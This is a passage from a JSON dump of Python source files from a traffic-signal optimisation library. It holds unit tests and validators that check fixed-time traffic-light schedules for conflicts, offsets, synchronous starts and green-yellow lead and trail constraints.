traffic\")\n fixed_time_schedule, phase_diagram, objective_value, _ = SwiftMobilityCloudApi.get_optimized_fts(\n intersection=intersection, arrival_rates=arrival_rates, min_period_duration=30, max_period_duration=180,\n objective=ObjectiveEnum.max_capacity)\n\n # objective_value < 1 implies that the intersection is oversaturated for any traffic light controller.\n logging.info(f\"Computed maximum sustainable increase in traffic: {(objective_value - 1) * 100:.2f}%\")\n\n if print_fixed_time_schedule:\n logging.info(fixed_time_schedule)\n logging.info(phase_diagram)\n\n\nif __name__ == \"__main__\":\n logging.getLogger().setLevel(logging.INFO)\n maximize_intersection_capacity()\n"
},
{
"alpha_fraction": 0.6233813762664795,
"alphanum_fraction": 0.6457049250602722,
"avg_line_length": 51.82273483276367,
"blob_id": "7dbaf44504d8c5d85465e53a42d053ab2fdd1380",
"content_id": "dc6306c20460e3029ae0bed6eb849f999bb0c9e6",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 27415,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 519,
"path": "/swift_cloud_py/validate_safety_restrictions/test/test_violation_of_other_sg_relations.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom copy import deepcopy\nfrom typing import List, Optional\n\nfrom swift_cloud_py.common.errors import SafetyViolation\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.intersection.traffic_light import TrafficLight\nfrom swift_cloud_py.entities.intersection.signalgroup import SignalGroup\nfrom swift_cloud_py.entities.control_output.fixed_time_schedule import FixedTimeSchedule, GreenYellowInterval\nfrom swift_cloud_py.entities.intersection.sg_relations import SyncStart, Offset, GreenyellowLead, Conflict, \\\n GreenyellowTrail\nfrom swift_cloud_py.validate_safety_restrictions.validate_other_sg_relations import find_other_sg_relation_matches, \\\n get_shift_of_one_to_one_match, get_other_sg_relation_shift, validate_other_sg_relations\n\n\nclass TestFindOtherRelationMatches(unittest.TestCase):\n \"\"\" Unittests of the function find_other_sg_relation_matches \"\"\"\n\n def test_zero_shift(self) -> None:\n \"\"\" Test finding a shift of zero \"\"\"\n # GIVEN\n sync_start = SyncStart(from_id=\"sg1\", to_id=\"sg2\")\n fts = FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg2=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=30),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=60)]),\n period=100)\n\n # WHEN\n matches = find_other_sg_relation_matches(other_relation=sync_start, fts=fts, index_from=0)\n matches2 = find_other_sg_relation_matches(other_relation=sync_start, fts=fts, index_from=1)\n\n # THEN\n self.assertListEqual(matches, [1, 0])\n self.assertListEqual(matches2, [0, 1])\n\n def test_shift_one(self) -> None:\n \"\"\" Test finding a shift of one \"\"\"\n # GIVEN\n sync_start = SyncStart(from_id=\"sg1\", to_id=\"sg2\")\n fts = FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg2=[GreenYellowInterval(start_greenyellow=50, end_greenyellow=60),\n GreenYellowInterval(start_greenyellow=10, end_greenyellow=30)]),\n period=100)\n\n # WHEN\n matches = find_other_sg_relation_matches(other_relation=sync_start, fts=fts, index_from=0)\n matches2 = find_other_sg_relation_matches(other_relation=sync_start, fts=fts, index_from=1)\n\n # THEN\n self.assertListEqual(matches, [0, 1])\n self.assertListEqual(matches2, [1, 0])\n\n def test_no_shift_possible(self) -> None:\n \"\"\" Test finding the shifts for a schedule without an unambiguous shift\"\"\"\n # GIVEN\n sync_start = SyncStart(from_id=\"sg1\", to_id=\"sg2\")\n fts = FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=30),\n GreenYellowInterval(start_greenyellow=40, end_greenyellow=50),\n GreenYellowInterval(start_greenyellow=60, end_greenyellow=80)],\n sg2=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=30),\n GreenYellowInterval(start_greenyellow=40, end_greenyellow=50),\n GreenYellowInterval(start_greenyellow=60, end_greenyellow=80)]),\n period=100)\n\n # swap two intervals (we do this after initialization as otherwise we would get a ValueError (not correct order\n # of greenyellow intervals) when initializing the FixedTimeSchedule\n fts._greenyellow_intervals[\"sg2\"][:2] = reversed(fts._greenyellow_intervals[\"sg2\"][:2])\n\n # WHEN\n matches = find_other_sg_relation_matches(other_relation=sync_start, fts=fts, index_from=0)\n matches2 = find_other_sg_relation_matches(other_relation=sync_start, fts=fts, index_from=1)\n matches3 = find_other_sg_relation_matches(other_relation=sync_start, fts=fts, index_from=2)\n\n # THEN\n self.assertListEqual(matches, [0, 1, 0])\n self.assertListEqual(matches2, [1, 0, 0])\n self.assertListEqual(matches3, [0, 0, 1])\n\n\nclass TestGetOneToOneMatch(unittest.TestCase):\n \"\"\" Unittests of the function get_shift_of_one_to_one_match \"\"\"\n\n def test_zero_shift(self) -> None:\n \"\"\" Test finding a shift of zero \"\"\"\n # GIVEN (matches has a diagonal of True values indicating a shift of zero)\n matches = [[True, False, True], [False, True, False], [True, False, True]]\n\n # WHEN\n shift = get_shift_of_one_to_one_match(matches=matches)\n\n # THEN\n self.assertEqual(shift, 0)\n\n def test_shift_of_one(self) -> None:\n \"\"\" Test finding a shift of one \"\"\"\n # GIVEN\n matches = [[False, True, True], [False, True, True], [True, False, False]]\n\n # WHEN\n shift = get_shift_of_one_to_one_match(matches=matches)\n\n # THEN\n self.assertEqual(shift, 1)\n\n def test_no_shift_possible(self) -> None:\n \"\"\" Test finding no shift is possible if matches shows no unambiguous shift\"\"\"\n # GIVEN\n matches = [[False, False, True], [False, True, True], [True, False, False]]\n\n # WHEN\n shift = get_shift_of_one_to_one_match(matches=matches)\n\n # THEN\n self.assertEqual(shift, None)\n\n\nclass TestGetOtherRelationShift(unittest.TestCase):\n \"\"\" Unittests of the function get_other_sg_relation_shift \"\"\"\n\n def test_zero_shift(self) -> None:\n \"\"\" Test finding a shift of zero \"\"\"\n # GIVEN\n sync_start = SyncStart(from_id=\"sg1\", to_id=\"sg2\")\n fts = FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg2=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=30),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=80)]),\n period=100)\n\n # WHEN\n shift = get_other_sg_relation_shift(other_relation=sync_start, fts=fts)\n\n # THEN\n self.assertEqual(shift, 0)\n\n def test_shift_of_one(self) -> None:\n \"\"\" Test finding a shift of one \"\"\"\n # GIVEN\n sync_start = SyncStart(from_id=\"sg1\", to_id=\"sg2\")\n fts = FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg2=[GreenYellowInterval(start_greenyellow=50, end_greenyellow=80),\n GreenYellowInterval(start_greenyellow=10, end_greenyellow=30)]),\n period=100)\n\n # WHEN\n shift = get_other_sg_relation_shift(other_relation=sync_start, fts=fts)\n\n # THEN\n self.assertEqual(shift, 1)\n\n def test_no_shift_possible(self) -> None:\n \"\"\" Test finding no shift is possible for a schedule without an unambiguous shift\"\"\"\n # GIVEN\n sync_start = SyncStart(from_id=\"sg1\", to_id=\"sg2\")\n fts = FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=30),\n GreenYellowInterval(start_greenyellow=40, end_greenyellow=50),\n GreenYellowInterval(start_greenyellow=60, end_greenyellow=80)],\n sg2=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=30),\n GreenYellowInterval(start_greenyellow=40, end_greenyellow=50),\n GreenYellowInterval(start_greenyellow=60, end_greenyellow=80)]),\n period=100)\n\n # Swap two intervals (we do this after initialization as otherwise we would get a ValueError (not correct order\n # of greenyellow intervals)\n fts._greenyellow_intervals[\"sg2\"][:2] = reversed(fts._greenyellow_intervals[\"sg2\"][:2])\n\n # WHEN\n shift = get_other_sg_relation_shift(other_relation=sync_start, fts=fts)\n\n # THEN\n self.assertEqual(shift, None)\n\n\nclass TestFTSOtherSGRelationValidation(unittest.TestCase):\n \"\"\" Test validation of other sg relations (synchronous starts, offsets, greenyellow-leads,...)\"\"\"\n\n @staticmethod\n def get_default_signalgroup(name: str, min_greenyellow: float = 10.0, max_greenyellow: float = 80.0,\n min_red: float = 10.0, max_red: float = 80.0) -> SignalGroup:\n \"\"\" Get a default signalgroup object\"\"\"\n traffic_light = TrafficLight(capacity=0.5, lost_time=0.0)\n return SignalGroup(id=name, traffic_lights=[traffic_light],\n min_greenyellow=min_greenyellow, max_greenyellow=max_greenyellow, min_red=min_red,\n max_red=max_red, min_nr=1, max_nr=3)\n\n @staticmethod\n def get_default_intersection(additional_signalgroups: Optional[List[SignalGroup]] = None,\n sync_starts: List[SyncStart] = None,\n offsets: List[Offset] = None,\n greenyellow_leads: List[GreenyellowLead] = None,\n greenyellow_trails: List[GreenyellowTrail] = None,\n ) -> Intersection:\n \"\"\"\n Get a default intersection object with 2 conflicting signal groups \"sg1\" and \"sg2\"\n :param additional_signalgroups: signal groups to add to the intersection (besides signal group 'sg1' and 'sg2')\n :param sync_starts: SyncStarts that must be satisfied\n :param offsets: Coordinations that must be satisfied\n :param greenyellow_leads: GreenyellowLeads that must be satisfied\n :param greenyellow_trails: GreenyellowTrails that must be satisfied\n :return: the intersection object\n \"\"\"\n if additional_signalgroups is None:\n additional_signalgroups = []\n\n if sync_starts is None:\n sync_starts = []\n if offsets is None:\n offsets = []\n if greenyellow_leads is None:\n greenyellow_leads = []\n if greenyellow_trails is None:\n greenyellow_trails = []\n\n signalgroup1 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg1\")\n signalgroup2 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg2\")\n\n conflict = Conflict(id1=\"sg1\", id2=\"sg2\", setup12=2, setup21=3)\n\n intersection = Intersection(signalgroups=[signalgroup1, signalgroup2] + additional_signalgroups,\n conflicts=[conflict], sync_starts=sync_starts, offsets=offsets,\n greenyellow_leads=greenyellow_leads, greenyellow_trails=greenyellow_trails)\n\n return intersection\n\n def test_correct_sync_starts(self) -> None:\n \"\"\"\n Test that validation of correct synchronous start passes.\n :return:\n \"\"\"\n # GIVEN\n sync_start = SyncStart(from_id=\"sg3\", to_id=\"sg4\")\n fts = FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=15, end_greenyellow=35)],\n sg2=[GreenYellowInterval(start_greenyellow=45, end_greenyellow=65)],\n sg3=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg4=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=30),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=60)]),\n period=100)\n signalgroup3 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg3\")\n signalgroup4 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg4\")\n intersection = TestFTSOtherSGRelationValidation.get_default_intersection(\n additional_signalgroups=[signalgroup3, signalgroup4], sync_starts=[sync_start])\n\n # WHEN validating\n validate_other_sg_relations(intersection=intersection, fts=fts)\n\n # THEN no error should be raised\n\n def test_incorrect_sync_starts(self) -> None:\n \"\"\"\n Test that validation of incorrect synchronous start raises SafetyViolation.\n :return:\n \"\"\"\n # GIVEN\n sync_start = SyncStart(from_id=\"sg3\", to_id=\"sg4\")\n fts = FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=15, end_greenyellow=35)],\n sg2=[GreenYellowInterval(start_greenyellow=45, end_greenyellow=65)],\n sg3=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg4=[GreenYellowInterval(start_greenyellow=9, end_greenyellow=30),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=60)]),\n period=100)\n signalgroup3 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg3\")\n signalgroup4 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg4\")\n intersection = TestFTSOtherSGRelationValidation.get_default_intersection(\n additional_signalgroups=[signalgroup3, signalgroup4], sync_starts=[sync_start])\n\n with self.assertRaises(SafetyViolation):\n # WHEN validating\n validate_other_sg_relations(intersection=intersection, fts=fts)\n\n # THEN an error should be raised\n\n def test_correct_offset(self) -> None:\n \"\"\"\n Test that validation of correct offset passes.\n :return:\n \"\"\"\n # GIVEN\n offset = Offset(from_id=\"sg3\", to_id=\"sg4\", seconds=20)\n fts = FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=15, end_greenyellow=35)],\n sg2=[GreenYellowInterval(start_greenyellow=45, end_greenyellow=65)],\n sg3=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg4=[GreenYellowInterval(start_greenyellow=30, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=70, end_greenyellow=90)]),\n period=100)\n signalgroup3 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg3\")\n signalgroup4 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg4\")\n intersection = TestFTSOtherSGRelationValidation.get_default_intersection(\n additional_signalgroups=[signalgroup3, signalgroup4], offsets=[offset])\n\n for interval_shift in range(2):\n with self.subTest(f\"interval_shift={interval_shift}\"):\n fts_copy = deepcopy(fts)\n fts_copy._greenyellow_intervals[\"sg4\"] = fts_copy._greenyellow_intervals[\"sg4\"][:interval_shift] + \\\n fts_copy._greenyellow_intervals[\"sg4\"][interval_shift:]\n # WHEN validating\n validate_other_sg_relations(intersection=intersection, fts=fts_copy)\n\n # THEN no error should be raised\n\n def test_incorrect_offset(self) -> None:\n \"\"\"\n Test that validation of incorrect offset raises SafetyViolation.\n :return:\n \"\"\"\n # GIVEN\n offset = Offset(from_id=\"sg3\", to_id=\"sg4\", seconds=20)\n fts_org = FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=15, end_greenyellow=35)],\n sg2=[GreenYellowInterval(start_greenyellow=45, end_greenyellow=65)],\n sg3=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg4=[GreenYellowInterval(start_greenyellow=30, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=69, end_greenyellow=90)]),\n period=100)\n signalgroup3 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg3\")\n signalgroup4 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg4\")\n intersection = TestFTSOtherSGRelationValidation.get_default_intersection(\n additional_signalgroups=[signalgroup3, signalgroup4], offsets=[offset])\n\n for interval_shift in range(2):\n with self.subTest(f\"interval_shift={interval_shift}\"):\n fts = deepcopy(fts_org)\n fts._greenyellow_intervals[\"sg4\"] = fts._greenyellow_intervals[\"sg4\"][:interval_shift] + \\\n fts._greenyellow_intervals[\"sg4\"][interval_shift:]\n\n with self.assertRaises(SafetyViolation):\n # WHEN validating\n validate_other_sg_relations(intersection=intersection, fts=fts)\n\n # THEN a SafetyViolation error should be raised\n\n def test_correct_greenyellow_lead(self) -> None:\n \"\"\"\n Test that validation of correct greenyellow-lead passes.\n :return:\n \"\"\"\n # GIVEN\n min_greenyellow_lead = 20\n max_greenyellow_lead = 30\n greenyellow_lead = GreenyellowLead(from_id=\"sg3\", to_id=\"sg4\",\n min_seconds=min_greenyellow_lead, max_seconds=max_greenyellow_lead)\n fts = FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=15, end_greenyellow=35)],\n sg2=[GreenYellowInterval(start_greenyellow=45, end_greenyellow=65)],\n sg3=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg4=[GreenYellowInterval(start_greenyellow=30, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=69, end_greenyellow=90)]),\n period=100)\n signalgroup3 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg3\")\n signalgroup4 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg4\")\n intersection = TestFTSOtherSGRelationValidation.get_default_intersection(\n additional_signalgroups=[signalgroup3, signalgroup4], greenyellow_leads=[greenyellow_lead])\n\n for pre_start_time in [min_greenyellow_lead, max_greenyellow_lead]:\n for interval_shift in range(2):\n fts_copy = deepcopy(fts)\n\n # adjust schedule to the specified greenyellow_lead\n for index, greenyellow_interval in enumerate(fts_copy.get_greenyellow_intervals(signalgroup4)):\n greenyellow_start = (greenyellow_interval.start_greenyellow - pre_start_time) % fts_copy.period\n greenyellow_end = (greenyellow_start + 20) % fts_copy.period\n fts_copy._greenyellow_intervals[\"sg3\"][index] = GreenYellowInterval(\n start_greenyellow=greenyellow_start, end_greenyellow=greenyellow_end)\n\n fts_copy._greenyellow_intervals[\"sg4\"] = fts_copy._greenyellow_intervals[\"sg4\"][:interval_shift] + \\\n fts_copy._greenyellow_intervals[\"sg4\"][interval_shift:]\n\n with self.subTest(f\"greenyellow_lead={pre_start_time}, interval_shift={interval_shift}\"):\n # WHEN validating\n validate_other_sg_relations(intersection=intersection, fts=fts_copy)\n\n # THEN no error should be raised\n\n def test_incorrect_greenyellow_lead(self) -> None:\n \"\"\"\n Test that validation of incorrect greenyellow-lead raises SafetyViolation.\n :return:\n \"\"\"\n # GIVEN\n min_greenyellow_lead = 20\n max_greenyellow_lead = 30\n greenyellow_lead = GreenyellowLead(from_id=\"sg3\", to_id=\"sg4\",\n min_seconds=min_greenyellow_lead, max_seconds=max_greenyellow_lead)\n fts = FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=15, end_greenyellow=35)],\n sg2=[GreenYellowInterval(start_greenyellow=45, end_greenyellow=65)],\n sg3=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg4=[GreenYellowInterval(start_greenyellow=30, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=69, end_greenyellow=90)]),\n period=100)\n signalgroup3 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg3\")\n signalgroup4 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg4\")\n intersection = TestFTSOtherSGRelationValidation.get_default_intersection(\n additional_signalgroups=[signalgroup3, signalgroup4], greenyellow_leads=[greenyellow_lead])\n\n for lead_time in [min_greenyellow_lead - 1, max_greenyellow_lead + 1]:\n for interval_shift in range(2):\n fts_copy = deepcopy(fts)\n\n # adjust schedule to the specified greenyellow-lead\n for index, greenyellow_interval in enumerate(fts_copy.get_greenyellow_intervals(signalgroup4)):\n greenyellow_start = (greenyellow_interval.start_greenyellow - lead_time) % fts_copy.period\n greenyellow_end = (greenyellow_start + 20) % fts_copy.period\n fts_copy._greenyellow_intervals[\"sg3\"][index] = GreenYellowInterval(\n start_greenyellow=greenyellow_start, end_greenyellow=greenyellow_end)\n\n fts_copy._greenyellow_intervals[\"sg4\"] = fts_copy._greenyellow_intervals[\"sg4\"][:interval_shift] + \\\n fts_copy._greenyellow_intervals[\"sg4\"][interval_shift:]\n\n with self.subTest(f\"greenyellow_lead={lead_time}, interval_shift={interval_shift}\"):\n with self.assertRaises(SafetyViolation):\n # WHEN validating\n validate_other_sg_relations(intersection=intersection, fts=fts_copy)\n\n # THEN a SafetyViolation should be raised\n\n def test_correct_greenyellow_trail(self) -> None:\n \"\"\"\n Test that validation of correct greenyellow-lead passes.\n :return:\n \"\"\"\n # GIVEN\n min_greenyellow_lead = 20\n max_greenyellow_lead = 30\n greenyellow_trail = GreenyellowTrail(from_id=\"sg3\", to_id=\"sg4\",\n min_seconds=min_greenyellow_lead, max_seconds=max_greenyellow_lead)\n fts = FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=15, end_greenyellow=35)],\n sg2=[GreenYellowInterval(start_greenyellow=45, end_greenyellow=65)],\n sg3=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg4=[GreenYellowInterval(start_greenyellow=30, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=69, end_greenyellow=90)]),\n period=100)\n signalgroup3 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg3\")\n signalgroup4 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg4\")\n intersection = TestFTSOtherSGRelationValidation.get_default_intersection(\n additional_signalgroups=[signalgroup3, signalgroup4], greenyellow_trails=[greenyellow_trail])\n\n for trail_time in [min_greenyellow_lead, max_greenyellow_lead]:\n for interval_shift in range(2):\n fts_copy = deepcopy(fts)\n\n # adjust schedule to the specified greenyellow-trail\n for index, greenyellow_interval in enumerate(fts_copy.get_greenyellow_intervals(signalgroup4)):\n greenyellow_end = (greenyellow_interval.end_greenyellow - trail_time) % fts_copy.period\n greenyellow_start = (greenyellow_end - 20) % fts_copy.period\n fts_copy._greenyellow_intervals[\"sg3\"][index] = GreenYellowInterval(\n start_greenyellow=greenyellow_start, end_greenyellow=greenyellow_end)\n\n fts_copy._greenyellow_intervals[\"sg4\"] = fts_copy._greenyellow_intervals[\"sg4\"][:interval_shift] + \\\n fts_copy._greenyellow_intervals[\"sg4\"][interval_shift:]\n\n with self.subTest(f\"greenyellow_lead={trail_time}, interval_shift={interval_shift}\"):\n # WHEN validating\n validate_other_sg_relations(intersection=intersection, fts=fts_copy)\n\n # THEN no error should be raised\n\n def test_incorrect_greenyellow_trail(self) -> None:\n \"\"\"\n Test that validation of incorrect greenyellow-trail raises SafetyViolation.\n :return:\n \"\"\"\n # GIVEN\n min_greenyellow_trail = 20\n max_greenyellow_trail = 30\n greenyellow_lead = GreenyellowLead(from_id=\"sg3\", to_id=\"sg4\",\n min_seconds=min_greenyellow_trail, max_seconds=max_greenyellow_trail)\n fts = FixedTimeSchedule(greenyellow_intervals=dict(\n sg1=[GreenYellowInterval(start_greenyellow=15, end_greenyellow=35)],\n sg2=[GreenYellowInterval(start_greenyellow=45, end_greenyellow=65)],\n sg3=[GreenYellowInterval(start_greenyellow=10, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=50, end_greenyellow=70)],\n sg4=[GreenYellowInterval(start_greenyellow=30, end_greenyellow=40),\n GreenYellowInterval(start_greenyellow=69, end_greenyellow=90)]),\n period=100)\n signalgroup3 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg3\")\n signalgroup4 = TestFTSOtherSGRelationValidation.get_default_signalgroup(name=\"sg4\")\n intersection = TestFTSOtherSGRelationValidation.get_default_intersection(\n additional_signalgroups=[signalgroup3, signalgroup4], greenyellow_leads=[greenyellow_lead])\n\n for trail_time in [min_greenyellow_trail - 1, max_greenyellow_trail + 1]:\n for interval_shift in range(2):\n fts_copy = deepcopy(fts)\n\n # adjust schedule to the specified greenyellow-lead\n for index, greenyellow_interval in enumerate(fts_copy.get_greenyellow_intervals(signalgroup4)):\n greenyellow_end = (greenyellow_interval.end_greenyellow - trail_time) % fts_copy.period\n greenyellow_start = (greenyellow_end - 20) % fts_copy.period\n fts_copy._greenyellow_intervals[\"sg3\"][index] = GreenYellowInterval(\n start_greenyellow=greenyellow_start, end_greenyellow=greenyellow_end)\n\n fts_copy._greenyellow_intervals[\"sg4\"] = fts_copy._greenyellow_intervals[\"sg4\"][:interval_shift] + \\\n fts_copy._greenyellow_intervals[\"sg4\"][interval_shift:]\n\n with self.subTest(f\"greenyellow_lead={trail_time}, interval_shift={interval_shift}\"):\n with self.assertRaises(SafetyViolation):\n # WHEN validating\n validate_other_sg_relations(intersection=intersection, fts=fts_copy)\n\n # THEN a SafetyViolation should be raised\n"
},
{
"alpha_fraction": 0.7518059611320496,
"alphanum_fraction": 0.7554179430007935,
"avg_line_length": 59.5625,
"blob_id": "d4d5b99714ebc31d4763a52b515f6e2003a1b05e",
"content_id": "d5c0292b508452ebc09211c0e927968dd3bbe0e0",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1938,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 32,
"path": "/swift_cloud_py/validate_safety_restrictions/validate_fixed_orders.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from swift_cloud_py.common.errors import SafetyViolation\nfrom swift_cloud_py.entities.control_output.fixed_time_schedule import FixedTimeSchedule\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.intersection.periodic_order import PeriodicOrder\n\nEPSILON = 10**(-6) # small value used in checks to correct for numeric inaccuracies\n\n\ndef validate_fixed_orders(intersection: Intersection, fts: FixedTimeSchedule) -> None:\n \"\"\" Validate that the the signalgroups indeed receive their greenyellow intervals\n in the requested periodic orders\n :return: -\n :raises SafetyException: if the requested order is not satisfied\"\"\"\n for periodic_order in intersection.periodic_orders:\n validate_fixed_order(intersection=intersection, fts=fts, periodic_order=periodic_order)\n\n\ndef validate_fixed_order(intersection: Intersection, fts: FixedTimeSchedule, periodic_order: PeriodicOrder) -> None:\n \"\"\" Validate that the the signalgroups indeed receive their greenyellow intervals\n in the requested periodic order (for only the periodic order that is given as argument).\n :return: -\n :raises SafetyException: if the requested order is not satisfied\"\"\"\n first_signalgroup = intersection.get_signalgroup(signalgroup_id=periodic_order.order[0])\n first_interval_start = fts.get_greenyellow_interval(first_signalgroup, k=0).start_greenyellow\n prev_switch = 0\n for signalgroup in periodic_order.order:\n for interval in fts.get_greenyellow_intervals(signalgroup):\n # shift schedule such that first greenyellow interval of the first signalgroup in the order starts at time=0\n switch = (interval.start_greenyellow - first_interval_start + EPSILON) % fts.period - EPSILON\n if switch < prev_switch:\n raise SafetyViolation(f\"Periodic order {periodic_order.to_json()} is violated\")\n prev_switch = switch\n"
},
{
"alpha_fraction": 0.6073307991027832,
"alphanum_fraction": 0.629511296749115,
"avg_line_length": 55,
"blob_id": "3b92becfa6a0cb36684cc62d5d822e1a3f5e60ee",
"content_id": "a3e8ff446d58821be16aa774eae33956dbb13d7c",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5320,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 95,
"path": "/swift_cloud_py/validate_safety_restrictions/test/test_violation_of_conflicts.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom copy import deepcopy\nfrom itertools import product\n\nfrom swift_cloud_py.common.errors import SafetyViolation\nfrom swift_cloud_py.entities.control_output.fixed_time_schedule import FixedTimeSchedule, GreenYellowInterval\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.entities.intersection.sg_relations import Conflict\nfrom swift_cloud_py.entities.intersection.signalgroup import SignalGroup\nfrom swift_cloud_py.entities.intersection.traffic_light import TrafficLight\nfrom swift_cloud_py.validate_safety_restrictions.validate_conflicts import validate_conflicts\n\n\nclass TestFTSConflictValidation(unittest.TestCase):\n \"\"\" unittests for validating satisfying conflicts and the associated minimum clearance times \"\"\"\n\n @staticmethod\n def get_default_signalgroup(name: str, min_greenyellow: float = 10.0, max_greenyellow: float = 80.0,\n min_red: float = 10.0, max_red: float = 80.0) -> SignalGroup:\n \"\"\" Get a default signalgroup object\"\"\"\n traffic_light = TrafficLight(capacity=0.5, lost_time=0.0)\n return SignalGroup(id=name, traffic_lights=[traffic_light],\n min_greenyellow=min_greenyellow, max_greenyellow=max_greenyellow, min_red=min_red,\n max_red=max_red, min_nr=1, max_nr=3)\n\n def test_conflict_satisfied(self) -> None:\n \"\"\"\n test that validations pass if constraints are satisfied\n :return:\n \"\"\"\n # GIVEN\n signalgroup1 = TestFTSConflictValidation.get_default_signalgroup(name=\"sg1\")\n signalgroup2 = TestFTSConflictValidation.get_default_signalgroup(name=\"sg2\")\n\n conflict = Conflict(id1=\"sg1\", id2=\"sg2\", setup12=2, setup21=3)\n\n intersection = Intersection(signalgroups=[signalgroup1, signalgroup2], conflicts=[conflict])\n\n fts = FixedTimeSchedule(\n greenyellow_intervals=dict(sg1=[GreenYellowInterval(start_greenyellow=90, end_greenyellow=10),\n GreenYellowInterval(start_greenyellow=33, end_greenyellow=60)],\n sg2=[GreenYellowInterval(start_greenyellow=12, end_greenyellow=30),\n GreenYellowInterval(start_greenyellow=62, end_greenyellow=87)]), period=100)\n\n for interval_shift in range(2):\n with self.subTest(f\"interval_shift={interval_shift}\"):\n fts._greenyellow_intervals[\"sg2\"] = \\\n fts._greenyellow_intervals[\"sg2\"][:interval_shift] + \\\n fts._greenyellow_intervals[\"sg2\"][interval_shift:]\n # WHEN validating\n validate_conflicts(intersection=intersection, fts=fts)\n\n # THEN no error should be raised\n\n def test_violating_conflict(self) -> None:\n \"\"\"\n test that validations fails if minimum clearance times are violated.\n \"\"\"\n # 